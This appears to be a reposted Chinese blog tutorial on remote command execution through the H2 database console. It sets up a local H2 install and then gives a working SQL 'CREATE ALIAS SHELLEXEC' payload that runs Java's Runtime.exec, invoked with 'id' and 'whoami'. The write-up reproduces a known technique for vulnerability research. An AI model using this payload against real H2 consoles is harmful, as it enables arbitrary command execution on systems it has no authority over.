码迷,mamicode.com
首页 > 数据库 > 详细

H2数据库Rce利用

时间:2021-03-17 15:05:47      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:java代码   ber   throws   runtime   img   执行命令   参考   https   ima   

0x01 前言

在分析SkyWalking的时候,发现该漏洞需要用到h2数据库的只是,于是就此复现下利用方式。可以说是对这篇文章的复现

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

0x02 环境搭建

访问h2数据库官网下载数据库安装包

技术图片

切换到切换到h2/bin/目录下,执行

chmod 777 h2.sh
./h2.sh

访问8082端口,可以看到该数据库的登录界面,默认无密码

技术图片

直接登入该数据库,可以在sql语句执行框执行想要利用的语句

技术图片

0x03

利用alias别名,调用java代码进行命令执行

//创建别名
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;

//调用SHELLEXEC执行命令
CALL SHELLEXEC(‘id‘);
CALL SHELLEXEC(‘whoami‘);

技术图片

执行whoami

技术图片

0x03 参考

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

H2数据库Rce利用

标签:java代码   ber   throws   runtime   img   执行命令   参考   https   ima   

原文地址:https://www.cnblogs.com/0x28/p/14546972.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!